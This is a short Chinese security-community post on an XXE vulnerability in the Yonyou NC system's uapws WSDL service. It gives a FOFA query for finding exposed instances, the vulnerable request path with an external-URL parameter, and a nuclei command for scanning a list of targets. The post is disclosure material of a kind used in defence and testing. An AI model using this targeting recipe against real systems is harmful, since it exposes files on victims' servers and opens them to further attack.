用友 NC 系统 uapws wsdl XXE

漏洞描述

用友 NC 系统 uapws wsdl XXE漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击
 


 

fofa

app="用友-UFIDA-NC"

 


 

漏洞复现

存在漏洞的请求:

/uapws/service/nc.uap.oba.update.IUpdateService?xsd=xmlurl

nuclei-pocs

nuclei -t yonyou_NC_uapws_wsdl_XXE.yaml -l url.txt

图片[1]-用友 NC 系统 uapws wsdl XXE-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像角卡0
    • 头像惨出0